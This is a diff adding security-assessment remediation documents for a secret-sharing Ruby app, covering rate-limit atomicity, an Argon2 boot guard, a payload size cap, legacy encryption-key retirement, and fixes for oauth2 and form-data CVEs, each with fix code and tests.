+The production parameters are reasonable (`m_cost: 16` ⇒ 64 MiB; `t_cost: 2` is on the low side).
+The real hazard is that the **test** parameters — deliberately trivial so the suite runs fast — are
+chosen by nothing more than `ENV['RACK_ENV'] == 'test'`. If a production process is ever started with
+`RACK_ENV=test`, every new passphrase is hashed at 32 KiB / 1 pass, which is brute-forceable offline.
+Boot already defaults env to production (`boot.rb:111`: `OT.env = ENV['RACK_ENV'] || 'production'`)
+but does **not** refuse to *run* as `test` outside the test suite.
+
+## Root cause
+
+- **C4a:** the authoritative "have we exceeded the limit" decision is split across a read and a
+  later write, with no token reserved at gate time — the same check-then-act shape as C1, applied to
+  rate limiting.
+- **C4b:** a security-critical cost parameter is keyed off an ambient environment variable with no
+  guard that the variable is consistent with the actual deployment.
+
+## Prescribed resolution
+
+### C4a — reserve a token atomically *before* verifying
+
+Replace "read gate, verify, maybe record" with "**atomically count this attempt and decide**, then
+verify". Move the single atomic Lua to the front and have it return both the new count and the locked
+state, so the decision and the increment are one round-trip and concurrent guesses serialize on the
+`INCR`.
+
+#### Implementation steps
+
+1. **Extend the Lua to be the gate.** Generalise `RECORD_ATTEMPT_SCRIPT` so a single eval (a)
+   refuses immediately if already locked, and (b) otherwise reserves this attempt and reports the
+   count. Conceptually:
+
+   ```lua
+   -- KEYS[1]=attempts, KEYS[2]=lockout ; ARGV: window, max, lockout_dur
+   if redis.call('EXISTS', KEYS[2]) == 1 then
+     return {-1, redis.call('TTL', KEYS[2])}        -- locked: caller raises LimitExceeded
+   end
+   local n = redis.call('INCR', KEYS[1])
+   if n == 1 then redis.call('EXPIRE', KEYS[1], tonumber(ARGV[1])) end
+   if n >= tonumber(ARGV[2]) then
+     redis.call('SETEX', KEYS[2], tonumber(ARGV[3]), '1')
+     redis.call('DEL', KEYS[1])
+   end
+   return {n, 0}                                     -- reserved; n-th attempt this window
+   ```
+
+   This makes "am I allowed, and count me" a single atomic step. Concurrent guesses each get a
+   distinct `n`; the moment `n >= MAX_ATTEMPTS` the lockout is set, so the (N+1)-th caller is denied
+   within the same window instead of all sailing past a stale read.
+
+2. **Reserve before verify in the logic.** In `RevealSecret`/`ShowSecret` (and V1 after C3), call the
+   gate-and-reserve *before* `secret.passphrase?`. On a correct passphrase, **refund** the reserved
+   attempt via the existing `clear_passphrase_rate_limit!` (`passphrase_rate_limiter.rb:123-130`) so
+   a legitimate user who eventually types it right is not penalised. On a wrong passphrase, the token
+   is already counted — no second round-trip.
+
+   ```ruby
+   # raise_concerns: reserve+gate atomically (raises LimitExceeded if locked)
+   reserve_passphrase_attempt!(secret.identifier) if secret.has_passphrase?
+   # process: verify
+   if correct_passphrase
+     clear_passphrase_rate_limit!(secret.identifier)   # refund + reset
+   end
+   # (no separate record step — the reserve already counted it)
+   ```
+
+   This preserves "a wrong passphrase does not consume/burn the secret" (C1) while making the limit
+   decision atomic and the over-shoot exactly zero per window.
+
+   **Confirm first (behavioural):** reserving at gate time means an *empty* or absent passphrase
+   submission must not consume a token. Mirror the existing V2 guard
+   (`show_secret.rb:63` only records when `!passphrase.empty?`) so probing without a passphrase
+   doesn't burn the budget. Validate the refund-on-success path against the existing reveal specs.
+
+3. Keep `MAX_ATTEMPTS`/`ATTEMPT_WINDOW`/`LOCKOUT_DURATION` unchanged
+   (`passphrase_rate_limiter.rb:28-34`).
+
+#### Alternatives considered
+
+- **Wrap check+verify+record in a Familia lock keyed on the identifier.** Correct but heavier (lock
+  key + stale-lock handling) than a single atomic Lua. The reserve-before-verify approach needs no
+  lock.
+- **Leave it; the over-shoot is bounded.** Rejected on "get it right" grounds — the fix is small and
+  removes a real parallel-guessing amplifier.
+
+### C4b — boot guard against running as `test` in production
+
+Add a fail-fast guard at boot that refuses to start a non-test process under `RACK_ENV=test`. Boot
+already resolves env at `boot.rb:111` and `configure_familia.rb:44-46` already sets the precedent of
+a hard `raise` when the test environment is misconfigured (it refuses any Redis URI that isn't port
+2121 under `RACK_ENV=test`). Add the inverse guard:
+
+```ruby
+# in boot!, right after `OT.env = ENV['RACK_ENV'] || 'production'` (boot.rb:111)
+# A production/staging process must never run with the test-tier Argon2 cost
+# (passphrase_hashing.rb:68-74). The test suite sets OT.testing? via its own harness;
+# a deployed process must not claim RACK_ENV=test.
+if ENV['RACK_ENV'] == 'test' && !running_under_test_harness?
+  raise Onetime::Problem,
+        'Refusing to boot: RACK_ENV=test outside the test suite would select weak ' \
+        'Argon2 parameters (32 KiB/1 pass). Unset RACK_ENV or set it to production.'
+end
+```
+
+`running_under_test_harness?` should be a positive signal that the test runner is in control (e.g.
+RSpec/`defined?(RSpec)` loaded, or an explicit `OT_TEST=1` the harness sets), **not** merely
+`RACK_ENV=test` — otherwise the guard would tautologically pass. The goal is: only the real test
+suite gets the cheap cost; everything else fails loudly.
+
+Optionally, also raise `t_cost` for production from 2 toward 3–4 if a quick benchmark on target
+hardware keeps per-verify latency acceptable; this is a tuning improvement, not required for the
+guard.
+
+## Test / verification
+
+- **C4a concurrency:** spin N concurrent wrong-passphrase reveals against one identifier; assert at
+  most `MAX_ATTEMPTS` verifications are attempted before lockout and the (MAX+1)-th is denied
+  *within the same window* (today this over-shoots to N).
+- **C4a refund:** wrong, wrong, correct → assert attempts/lockout keys are cleared and no spurious
+  lockout remains.
+- **C4a no-passphrase probe:** submit with empty/absent passphrase repeatedly → assert no tokens
+  consumed (no lockout).
+- **C4b guard:** boot with `RACK_ENV=test` but without the test-harness signal → assert it raises;
+  boot under the real suite → assert it proceeds and uses the test cost; boot as production →
+  assert the 64 MiB cost is selected.
+
+## Effort & risk
+
+- **Effort:** Medium for C4a (Lua change + reorder reserve/verify in the logic, shared across
+  versions via the mixin), Low for C4b (one boot guard).
+- **Risk:** Low/medium. C4a touches the reveal path's gating, so cover with the concurrency + refund
+  tests; the happy path (correct first try) is unchanged thanks to the refund. C4b is purely
+  defensive and cannot affect the legitimate test suite if the harness signal is correct.
+- **Priority:** Medium — bundle with C3 (same limiter) and after C1.

--- a/docs/security/assessment-2026-06-22/resolutions/C4-rate-limit-atomicity-argon2-guard.md
+++ b/docs/security/assessment-2026-06-22/resolutions/C4-rate-limit-atomicity-argon2-guard.md
@@ -1,13 +1,26 @@
 # C4 — Passphrase rate-limit check/record gap + test-cost Argon2 selectable by RACK_ENV
 
 - **Severity:** Low/Medium — **CONFIRMED** in source (bounded over-shoot; config-dependent weak hash)
-- **Status:** Proposed fix
+- **Status:** Proposed fix — **corrected 2026-06-24 (snippet defect fixed in place; see callout)**
 - **Affects default config?** Partially — the non-atomic gate affects the default reveal flow under
   concurrency; the Argon2 test-cost only bites a misconfigured `RACK_ENV=test` in production
 - **Related:** finding 03 F4; C3 (shared limiter); C1 (the broader non-atomic-consume theme)
 - **Primary files:** `lib/onetime/security/passphrase_rate_limiter.rb`,
   `lib/onetime/models/features/passphrase_hashing.rb`,
   `apps/api/v2/logic/secrets/reveal_secret.rb`, `lib/onetime/boot.rb`
+
+> **⚠️ Re-verification correction (2026-06-24 blind pass — `RE-VERIFICATION-2026-06-24-independent.md` §5 (compile-level defects)).**
+> The C4b boot guard below is **incomplete (compile-level defect)**: it keys the test-harness
+> signal off `defined?(RSpec)`. This project runs **two** test runners — RSpec **and** Tryouts v3
+> (`try/`) — and Tryouts does not load RSpec. Under the Tryouts suite `defined?(RSpec)` is `nil`,
+> so `running_under_test_harness?` returns false while `RACK_ENV=test`, and the guard **raises
+> `Onetime::Problem` at boot → the entire Tryouts suite dies before any test runs.**
+>
+> **Correction:** do not gate on `defined?(RSpec)` at boot. Detect test/low-cost mode via a signal
+> both runners can set — prefer an explicit env var the harness exports (e.g. `OT_TEST=1`), or a
+> runtime check that is true under RSpec *and* Tryouts. The guard's intent (only the real suite gets
+> the cheap Argon2 cost) is unchanged; only the harness-detection predicate must be runner-agnostic.
+> The snippet at `boot.rb:158-161` is corrected in place below.
 
 ## Problem (recap)
 
@@ -155,10 +168,23 @@ if ENV['RACK_ENV'] == 'test' && !running_under_test_harness?
 end
 ```
 
-`running_under_test_harness?` should be a positive signal that the test runner is in control (e.g.
-RSpec/`defined?(RSpec)` loaded, or an explicit `OT_TEST=1` the harness sets), **not** merely
-`RACK_ENV=test` — otherwise the guard would tautologically pass. The goal is: only the real test
-suite gets the cheap cost; everything else fails loudly.
+`running_under_test_harness?` should be a positive signal that the test runner is in control, **not**
+merely `RACK_ENV=test` — otherwise the guard would tautologically pass. The goal is: only the real
+test suite gets the cheap cost; everything else fails loudly.
+
+```ruby
+def running_under_test_harness?
+  # corrected 2026-06-24: must be true under BOTH runners. This project uses RSpec AND
+  # Tryouts v3 (try/); `defined?(RSpec)` is nil under Tryouts, so a sole RSpec check would
+  # false-negative and the boot guard above would kill the whole Tryouts suite at boot.
+  # Use an explicit env signal the harness exports, recognised by either runner.
+  ENV['OT_TEST'] == '1' || defined?(RSpec) || defined?(Tryouts)
+end
+```
+
+The harness (RSpec `spec_helper` and the Tryouts runner) sets `OT_TEST=1`; the `defined?` checks are
+belt-and-suspenders for either runner being loaded. The key fix is that the predicate is **not**
+keyed on RSpec alone.
 
 Optionally, also raise `t_cost` for production from 2 toward 3–4 if a quick benchmark on target
 hardware keeps per-verify latency acceptable; this is a tuning improvement, not required for the

--- a/docs/security/assessment-2026-06-22/resolutions/C5-secret-payload-size-cap.md
+++ b/docs/security/assessment-2026-06-22/resolutions/C5-secret-payload-size-cap.md
@@ -1,0 +1,159 @@
+# C5 — No application-level cap on secret payload size
+
+- **Severity:** Low (DoS / resource exhaustion) — **CONFIRMED** in source
+- **Status:** Proposed fix
+- **Affects default config?** **Yes** — anonymous secret creation accepts arbitrarily large values
+- **Related:** finding 03 F5; plan-limit plumbing in
+  `lib/onetime/models/organization/features/with_materialized_limits.rb` (`limit_for`)
+- **Primary files:** `apps/api/v2/logic/secrets/base_secret_action.rb`,
+  `apps/api/v2/logic/secrets/conceal_secret.rb`,
+  `lib/onetime/models/receipt.rb` (`spawn_pair`), `etc/config.yaml` (`secret_options`)
+
+## Problem (recap)
+
+`ConcealSecret` / `BaseSecretAction` validate TTL, passphrase length, recipient, and share domain,
+but **never bound the byte size of the secret value itself**. `ConcealSecret#raise_concerns` only
+rejects an *empty* value:
+
+```ruby
+# apps/api/v2/logic/secrets/conceal_secret.rb:26-29
+def raise_concerns
+  require_guest_route_enabled!(:conceal)
+  super
+  raise_form_error 'You did not provide anything to share', field: :secret, error_type: :missing if secret_value.to_s.empty?
+end
+```
+
+`BaseSecretAction` bounds `passphrase` length (`base_secret_action.rb:289-299`) but has **no**
+value-size check anywhere (confirmed: only `passphrase` and the unrelated `memo`/`MEMO_MAX_LENGTH`
+are bounded). The value flows straight into storage: `create_secret_pair` →
+`Onetime::Receipt.spawn_pair(...)` → `secret.ciphertext = content` → `secret.save`
+(`base_secret_action.rb:329-335`, `receipt.rb:226,233`), where it is encrypted and stored as a Redis
+hash field with a TTL.
+
+## Root cause
+
+Payload size is treated as the deployment proxy's concern, not the application's. No Rack/body limit
+was found in-repo, so the only backstops are (a) whatever the upstream web server / reverse proxy
+imposes and (b) the per-secret TTL (secrets expire — default 7 days, `base_secret_action.rb:113`).
+There is no app-level ceiling, and no tie-in to plan limits, so an unauthenticated client can store
+very large blobs.
+
+## Impact
+
+Bounded but real: an attacker (especially anonymous, where there is no account to throttle) can
+inflate Redis memory by creating large secrets faster than they expire, amplifying memory/cost
+pressure. AEAD encryption (`manager.rb:17-23`) also copies the plaintext in memory during encryption,
+so very large values cost CPU/RAM per request. Mitigated by TTL and any proxy body limit, but those
+are not guaranteed and not under app control.
+
+## Prescribed resolution
+
+Enforce a **maximum byte size** on the secret value in the shared base action, returning a form
+error above the limit, and tie the ceiling to plan limits where billing is enabled. Centralise the
+check in `BaseSecretAction` so it covers `ConcealSecret`, `GenerateSecret`, and any future
+sub-action.
+
+### Implementation steps
+
+1. **Add a config knob** under the existing `secret_options` block (`etc/config.yaml:198-220`,
+   alongside `default_ttl`, `ttl_options`, `passphrase:`). Use bytes and an ENV override consistent
+   with the file's style:
+
+   ```yaml
+   secret_options:
+     # Maximum size (bytes) of a single secret's plaintext value. Guards Redis
+     # memory against oversized payloads. Measured on the UTF-8 byte length.
+     max_value_size: <%= ENV['SECRET_MAX_VALUE_SIZE'] || 256000 %>   # 256 KB default
+   ```
+
+   256 KB is a suggested default — generous for passwords/keys/notes, modest for Redis. Confirm an
+   appropriate value with the maintainer for the product's real use cases.
+
+2. **Validate in `BaseSecretAction`.** Add a `validate_secret_size` and call it from
+   `raise_concerns` (`base_secret_action.rb:41-48`), after `kind` is known so the error is
+   value-neutral about *which* sub-action ran. Measure **bytesize**, not character length (UTF-8
+   multibyte and binary blobs):
+
+   ```ruby
+   def raise_concerns
+     require_entitlement!('api_access')
+     raise_form_error 'Unknown type of secret' if kind.nil?
+
+     validate_secret_size
+     validate_recipient
+     validate_share_domain
+     validate_passphrase
+   end
+
+   # Bytes, not chars — a UTF-8 value's char count understates Redis cost.
+   def validate_secret_size
+     size  = secret_value.to_s.bytesize
+     limit = max_secret_value_size
+     return if size <= limit
+
+     raise_form_error "Secret is too large (#{size} bytes; maximum #{limit}).",
+       field: :secret, error_type: :too_large
+   end
+   ```
+
+3. **Resolve the limit, plan-aware.** Mirror the `process_ttl` pattern
+   (`base_secret_action.rb:103-110`), which already uses `auth_org.limit_for('secret_lifetime')`
+   with a config fallback and fails open (unlimited) when billing is off:
+
+   ```ruby
+   def max_secret_value_size
+     config_max = (OT.conf.dig('site', 'secret_options', 'max_value_size') || 256_000).to_i
+
+     if auth_org && auth_org.respond_to?(:limit_for)
+       plan_max = auth_org.limit_for('secret_value_size')  # billing.yaml limit, if defined
+       return plan_max if plan_max.is_a?(Numeric) && plan_max.positive? && plan_max != Float::INFINITY
+     end
+     config_max
+   end
+   ```
+
+   `limit_for` already returns `Float::INFINITY` when billing is disabled (self-hosted/standalone,
+   `with_materialized_limits.rb:68-70`), so self-hosters keep the config ceiling rather than being
+   forced to a plan. If you add a `secret_value_size` limit to `etc/billing.yaml` plans, paid tiers
+   can raise it; if you do not, the config default governs everyone. **Confirm first** whether plan
+   tiering of payload size is desired before adding the billing key — the config-only ceiling is the
+   minimum viable fix and is enough to close the DoS.
+
+4. **Keep the empty-value check** in `ConcealSecret` (`conceal_secret.rb:29`) — size validation is
+   the upper bound; the empty check is the lower bound. They are complementary.
+
+### Defense-in-depth (recommended, separate from the app fix)
+
+Document a reverse-proxy / Rack body-size limit in the deployment runbook as a first line of defense
+so oversized requests are rejected before reaching Ruby. The app-level cap is the authoritative one,
+but a proxy limit avoids buffering huge bodies into the worker at all.
+
+### Alternatives considered
+
+- **Rely on a proxy body limit only.** Rejected: not present in-repo, not guaranteed across
+  deployments, and gives no plan-aware behaviour or clean form error.
+- **Character-length limit.** Rejected: understates Redis cost for multibyte/binary content;
+  `bytesize` is the correct measure.
+- **Truncate silently.** Rejected: silently dropping secret content is dangerous (the user thinks
+  they shared the whole thing). A hard error is correct.
+
+## Test / verification
+
+- **Over-limit:** submit a value 1 byte over `max_value_size` → assert `too_large` form error and
+  that no `Secret`/`Receipt` was created (assert `spawn_pair` not reached / no new keys).
+- **At-limit:** submit exactly `max_value_size` bytes → succeeds.
+- **Bytesize correctness:** a multibyte UTF-8 string whose char count is under but byte count is over
+  the limit → rejected (guards against measuring `.length` instead of `.bytesize`).
+- **Plan-aware (if billing key added):** org with a higher `secret_value_size` limit accepts a value
+  that a free org rejects; billing-disabled deployment falls back to the config ceiling.
+- **Empty still rejected:** ensure the existing empty-value error
+  (`conceal_secret.rb:29`) is unaffected.
+
+## Effort & risk
+
+- **Effort:** Low. One config key, one validation method in the shared base, optional billing key.
+- **Risk:** Low. Purely additive validation on the create path; existing valid secrets are
+  unaffected. The only behavioural change is rejecting oversized payloads, which is the intent.
+  Choose the default limit deliberately so legitimate large-but-valid secrets are not broken.
+- **Priority:** Low — bundle with C4/C6 after the higher-severity items.

--- a/docs/security/assessment-2026-06-22/resolutions/C6-legacy-v1-encryption-key-retirement.md
+++ b/docs/security/assessment-2026-06-22/resolutions/C6-legacy-v1-encryption-key-retirement.md
@@ -1,0 +1,135 @@
+# C6 — Legacy v1 encryption key is unsalted SHA-256 of `site.secret`
+
+- **Severity:** Low (informational) — **CONFIRMED** in source (read-compat only; not used for writes)
+- **Status:** Proposed fix (planned retirement, not an urgent patch)
+- **Affects default config?** Yes, but only as a *decryption fallback* — all new writes already use
+  v2 HKDF
+- **Related:** finding 03 F6; C2 (same initializer, the inner-KDF domain separation); the
+  v1→v2 migration features on `Onetime::Secret`
+- **Primary files:** `lib/onetime/initializers/configure_familia.rb`,
+  `lib/onetime/key_derivation.rb`,
+  `lib/onetime/models/secret.rb`,
+  `lib/onetime/models/secret/features/migration_fields.rb`,
+  `familia/lib/familia/encryption/manager.rb`
+
+## Problem (recap)
+
+The v1 encryption key version is a single, **unsalted** SHA-256 of the root secret:
+
+```ruby
+# lib/onetime/initializers/configure_familia.rb:65
+v1_key = Base64.strict_encode64(Digest::SHA256.digest(secret_key))
+```
+
+It is registered alongside the v2 key, and `current_key_version` is `:v2`
+(`configure_familia.rb:68-72`), so **new writes use v2** (HKDF-derived,
+`key_derivation.rb:38,52,66`). The v1 entry exists only so that data written before the HKDF scheme
+can still be decrypted — Familia selects the key by the `key_version` recorded in each ciphertext
+envelope (`manager.rb:30,137,176`).
+
+This is acceptable as a read-only migration key, but a plain unsalted hash of the root secret is a
+weaker derivation than v2's HKDF (no salt, no `info` domain separation, single hash invocation), and
+it keeps a second copy of a root-secret-derived key in the configured keyset indefinitely.
+
+## Root cause
+
+The v1 key is a compatibility shim retained from before the HKDF migration. Nothing forces it to be
+removed once the data it decrypts is gone, so it lingers. The model already carries the machinery to
+know when it is safe to drop — it just is not being acted on.
+
+## Why it is low risk today
+
+- v1 is **never used to encrypt** — `current_key_version = :v2` (`configure_familia.rb:72`), and the
+  manager encrypts with `current_key_version` (`manager.rb:30,186-188`).
+- A v1 ciphertext only decrypts under the v1 key when its own envelope says `key_version: v1`; an
+  attacker cannot downgrade a v2 ciphertext to v1, because the version is read from the
+  (authenticated) stored envelope, not chosen at decrypt time.
+- The weakness is the *derivation quality* of a key that protects only already-existing legacy data,
+  whose confidentiality still rests on `site.secret` staying secret.
+
+So this is informational hygiene: retire the weaker key once it has no data to read, shrinking the
+attack surface and the key inventory.
+
+## Prescribed resolution
+
+Plan and execute the removal of the v1 key after the v1→v2 re-encryption / expiry window. The model
+already has the features to drive and verify this.
+
+### Implementation steps
+
+1. **Inventory remaining v1 ciphertext.** Use the migration feature already on `Onetime::Secret`:
+   `Secret.encryption_stats` returns `{ version => count }` by reading each secret's
+   `value_encryption` field (`migration_fields.rb:48-59`), and `encryption_version` maps `'1' → :v1`
+   (`:146-154`). Run it to confirm how many `:v1` secrets remain.
+
+   **Confirm first:** the v1 key decrypts *value* ciphertext written under the old scheme. Verify
+   that `value_encryption` reliably reflects the envelope `key_version` for the data in your store
+   (the migration notes at `migration_fields.rb:10-15` say v1→v2 **preserves** encryption rather than
+   re-encrypting, so old records keep `value_encryption: 1`). The count must reach zero through
+   **expiry** (secrets are TTL-bounded — default 7 days, max 30, `base_secret_action.rb:113,127`) or
+   an explicit re-encryption pass, before the key can be dropped.
+
+2. **Wait out the window (preferred) or re-encrypt.** Because secrets expire within ≤30 days, the
+   simplest path is time: once no secret predates the v2 cutover by more than the max TTL, no `:v1`
+   ciphertext can exist. If you cannot wait, add a one-off re-encryption task that loads each `:v1`
+   secret, decrypts under v1, and re-saves (which re-encrypts under v2 via the normal write path).
+   Either way, re-run `encryption_stats` and require `stats['1'] == 0` (and no `:v1` in any retained
+   record) as the gate.
+
+3. **Remove the v1 key from the keyset.** Once the inventory is zero, delete the v1 derivation and
+   registration in `configure_familia.rb`:
+
+   ```ruby
+   # delete:
+   v1_key = Base64.strict_encode64(Digest::SHA256.digest(secret_key))
+   # and change:
+   Familia.config.encryption_keys = { v1: v1_key, v2: v2_key }
+   # to:
+   Familia.config.encryption_keys = { v2: v2_key }
+   ```
+
+   After removal, any stray `:v1` ciphertext fails closed: `Manager#get_master_key` raises
+   `"No key for version: v1"` (`manager.rb:176-177`) rather than silently mis-decrypting — which is
+   the correct, loud failure mode if step 1's inventory was wrong.
+
+4. **Retire the migration features when fully done.** Once v1 is gone and the owner-id migration is
+   complete, the `with_migration_fields` / `secret_migration_fields` features
+   (`secret.rb:29-30`, `migration_fields.rb`) can also be dropped per their own removal note
+   (`migration_fields.rb:17`). This is a follow-on cleanup, not required for key removal.
+
+### Sequencing with C2
+
+C2 changes the *inner* KDF salt/personalization for the **current** (v2) provider path and does not
+touch the v1 master key, so the two are independent. Do C2 first (it improves the live path); do C6
+on its own schedule once the data window closes. Removing the v1 key has no effect on C2's
+salt-history (that is a v2/AES-GCM decrypt concern).
+
+### Alternatives considered
+
+- **Strengthen the v1 derivation in place.** Rejected: v1 must continue to decrypt *existing* v1
+  ciphertext, so its derivation cannot change without breaking that data. The only safe improvement
+  is removal after the data is gone.
+- **Leave it forever.** Rejected on hygiene grounds — it keeps a weaker root-secret-derived key in
+  the configured set with no remaining purpose, exactly the kind of latent surface the assessment
+  flags.
+
+## Test / verification
+
+- **Inventory gate:** assert `Secret.encryption_stats['1'] == 0` (and no retained `:v1` record)
+  before allowing the key removal change to merge — encode this as a guard in the migration/runbook.
+- **Post-removal fail-closed:** with the v1 key removed, attempt to decrypt a synthetic `:v1`-tagged
+  ciphertext → assert `EncryptionError "No key for version: v1"` (`manager.rb:177`), never a silent
+  wrong-plaintext.
+- **v2 unaffected:** full encrypt/decrypt round-trip on a new secret after removal still works
+  (only `:v2` in the keyset).
+- **Regression:** existing reveal specs pass unchanged after removal (no v1 data left to read).
+
+## Effort & risk
+
+- **Effort:** Low code (a few lines in the initializer) but gated on an **operational** window —
+  most of the work is confirming the inventory is empty and waiting out / running the migration.
+- **Risk:** Low if the inventory gate is honoured; **data-loss if removed prematurely** (any
+  surviving `:v1` ciphertext becomes permanently undecryptable). The fail-closed behaviour makes a
+  mistake loud rather than silent, but the gate in step 1 is mandatory.
+- **Priority:** Lowest of the batch — informational hygiene, do after C2/C3/C4/C5 and only when the
+  data window has closed.

--- a/docs/security/assessment-2026-06-22/resolutions/D1-oauth2-cve.md
+++ b/docs/security/assessment-2026-06-22/resolutions/D1-oauth2-cve.md
@@ -35,6 +35,14 @@ already permits the fix; only the lockfile needs to move.
 4. **Regression:** run the SSO/OmniAuth integration specs (the `apps/web/auth/spec/integration/full/omniauth_*`
    suite) to confirm no behavioral change from the bump.
 
+## Test / verification
+
+- `bundle exec bundler-audit check --update` reports **no** advisory for `oauth2` (was GHSA-pp92-crg2-gfv9).
+- `Gemfile.lock` shows `oauth2 (>= 2.0.22)`; the `omniauth_openid_connect` → `openid_connect` →
+  `rack-oauth2` chain still resolves and `bundle install --frozen` succeeds.
+- The OmniAuth/OIDC integration specs (`apps/web/auth/spec/integration/full/omniauth_*`) pass unchanged.
+- Built OCI image contains the patched gem (inspect the in-image `Gemfile.lock`).
+
 ## Alternatives considered
 
 - **Wait until SSO ships:** not advisable even though SSO is off by default — it's a free, low-risk bump

--- a/docs/security/assessment-2026-06-22/resolutions/D1-oauth2-cve.md
+++ b/docs/security/assessment-2026-06-22/resolutions/D1-oauth2-cve.md
@@ -1,0 +1,46 @@
+# D1 — `oauth2` 2.0.18 bearer-token leak (GHSA-pp92-crg2-gfv9)
+
+- **Severity:** High (gated on SSO/OIDC being enabled)
+- **Status:** Proposed fix (straightforward dependency bump)
+- **Affects default config?** No (SSO off by default)
+- **Related:** A1/A2/A4 (same SSO surface). Finding 06 #1.
+- **Primary files:** `Gemfile.lock:265` (`oauth2 (2.0.18)`); pulled transitively via the
+  `omniauth_openid_connect` → `openid_connect` → `rack-oauth2` chain.
+
+## Problem (recap)
+
+`oauth2` 2.0.18 is vulnerable to **GHSA-pp92-crg2-gfv9**: a protocol-relative redirect can cause the
+`Authorization` (bearer) header to be sent to an attacker-controlled host, leaking the token. The library
+is on the OIDC/OmniAuth login path, so it is reachable once SSO is enabled. Fixed in **2.0.22**.
+
+## Root cause
+
+A transitive dependency pinned (resolved) below the patched version. The top-level Gemfile constraint
+already permits the fix; only the lockfile needs to move.
+
+## Prescribed resolution
+
+1. **Bump to `>= 2.0.22`** and refresh the lockfile:
+   ```
+   bundle update oauth2 --conservative
+   ```
+   Confirm `Gemfile.lock` shows `oauth2 (>= 2.0.22)` and that the `omniauth_openid_connect` /
+   `rack-oauth2` chain still resolves. If a top-level pin is desired for clarity, add
+   `gem 'oauth2', '>= 2.0.22'` to the Gemfile (the existing `~> 2.0` / transitive constraints allow it).
+2. **Re-run the advisory scan** to confirm the advisory clears:
+   ```
+   bundle exec bundler-audit check --update
+   ```
+3. **Rebuild the OCI images** so the patched gem ships (the lockfile is frozen at build time).
+4. **Regression:** run the SSO/OmniAuth integration specs (the `apps/web/auth/spec/integration/full/omniauth_*`
+   suite) to confirm no behavioral change from the bump.
+
+## Alternatives considered
+
+- **Wait until SSO ships:** not advisable even though SSO is off by default — it's a free, low-risk bump
+  that removes a High before the feature goes live. Do it now.
+
+## Effort & risk
+
+- **Effort:** Trivial (one `bundle update` + image rebuild).
+- **Risk:** Very low — patch release within the same major; covered by the OmniAuth integration specs.

--- a/docs/security/assessment-2026-06-22/resolutions/D2-form-data-axios-cve.md
+++ b/docs/security/assessment-2026-06-22/resolutions/D2-form-data-axios-cve.md
@@ -1,0 +1,103 @@
+# D2 — `form-data` 4.0.5 (via `axios`) CRLF injection (GHSA-hmw2-7cc7-3qxx)
+
+- **Severity:** Medium (scanner-rated High; mitigated in this app — see below)
+- **Status:** Proposed fix (dependency bump / override)
+- **Affects default config?** Yes (ships in every browser bundle), but **not practically exploitable** — the vulnerable Node helper is unreachable from the browser adapter.
+- **Related:** Finding 06 #2; lockfile-integrity §2. Same JS supply-chain surface as D7 (dev-only JS CVEs).
+- **Primary files:** `pnpm-lock.yaml:3129` (`form-data@4.0.5`), `pnpm-lock.yaml:7027-7032`
+  (`axios@1.16.0` → `form-data: 4.0.5`), `package.json:158` (`"axios": "^1.16.0"`),
+  `pnpm-workspace.yaml` (`overrides:` block).
+
+## Problem (recap)
+
+`form-data` 4.0.5 is vulnerable to **GHSA-hmw2-7cc7-3qxx** (fixed in `>= 4.0.6`): an attacker who
+controls multipart field names/filenames can inject CRLF sequences into the generated multipart body.
+It is the **only production-tree** JS advisory reported by `pnpm audit --prod`, pulled transitively via
+`axios`:
+
+- `pnpm-lock.yaml:7027` — `axios@1.16.0` lists `form-data: 4.0.5` as a runtime dependency.
+- `package.json:158` — `"axios": "^1.16.0"`.
+- Audit paths: `.>axios>form-data` and `.>@vueuse/integrations>axios>form-data`
+  (`@vueuse/integrations@14.3.0` declares `axios` as an *optional* dependency, `pnpm-lock.yaml:6874`).
+
+## Root cause
+
+A transitive dependency resolved one patch below the fix. `form-data` is `axios`'s **Node-runtime**
+multipart helper. In this codebase `axios` is consumed only by the **browser** bundle
+(`src/shared/composables/useApi.ts` and the shared stores); the browser build uses axios's
+XHR/fetch adapter, which uses the native `FormData`/`Blob` APIs — **not** the Node `form-data`
+package. So the vulnerable code path is not bundled into anything that executes at runtime, which is
+why this is Medium-in-practice despite the High scanner rating. It still appears in the lockfile and
+the prod dependency tree, so it must be cleared as defence-in-depth and to silence the prod-tree alert.
+
+## Prescribed resolution
+
+### Implementation steps
+
+1. **Preferred — bump `axios`** so it naturally resolves `form-data >= 4.0.6`:
+   ```bash
+   pnpm update axios            # stays within the ^1.16.0 range; pulls latest 1.x
+   ```
+   If the latest 1.x still pins `form-data < 4.0.6`, widen/refresh the manifest:
+   ```bash
+   pnpm add axios@latest        # within major 1; updates package.json:158
+   ```
+   Then confirm the lockfile moved:
+   ```bash
+   grep -n "form-data@" pnpm-lock.yaml      # expect 4.0.6+ only
+   ```
+
+2. **Belt-and-suspenders — add a pnpm `overrides` entry** in `pnpm-workspace.yaml`
+   (the `overrides:` block already exists with `brace-expansion`, `yaml`, etc.):
+   ```yaml
+   overrides:
+     '@types/estree': '1.0.9'
+     'brace-expansion': '1.1.13'
+     'flatted': '^3.4.2'
+     'yaml': '^2.8.3'
+     'form-data': '>=4.0.6'   # GHSA-hmw2-7cc7-3qxx
+   ```
+   Then refresh:
+   ```bash
+   pnpm install --frozen-lockfile=false
+   ```
+   The override is the most robust choice because it pins **every** transitive path (both the direct
+   `axios` path and the `@vueuse/integrations > axios` path) regardless of what axios's own range
+   permits in future.
+
+3. **Rebuild the frontend bundle** so the resolved tree is what actually ships:
+   ```bash
+   pnpm run build
+   ```
+   (The production OCI image runs `pnpm install --frozen-lockfile`, so the committed lockfile is what
+   gets built — the lockfile change is the load-bearing artifact.)
+
+### Alternatives considered
+
+- **Do nothing (rely on the mitigation):** rejected. The mitigation (browser adapter doesn't use the
+  Node helper) is real but fragile — a future code change that imports axios in a Node context (an SSR
+  layer, a build script, a Node test that posts multipart) would silently reactivate the path. A patch
+  bump is free and removes the latent risk.
+- **Drop axios for native `fetch`:** larger refactor of `useApi.ts` and the stores; out of scope for a
+  CVE remediation and unnecessary given the override fixes it in one line.
+
+## Test / verification
+
+```bash
+# 1. No vulnerable form-data remains in the production tree
+pnpm audit --prod
+#    -> expect "No known vulnerabilities found" (or no GHSA-hmw2-7cc7-3qxx)
+
+# 2. Confirm the resolved version
+pnpm why form-data
+#    -> every path resolves to >= 4.0.6
+
+# 3. Frontend test suite still green (axios-backed API calls)
+pnpm run test
+```
+
+## Effort & risk
+
+- **Effort:** Trivial — one `overrides` line (or `pnpm update axios`) + lockfile refresh + bundle rebuild.
+- **Risk:** Very low. `form-data` 4.0.6 is a patch release; axios's public API is unchanged. Covered by
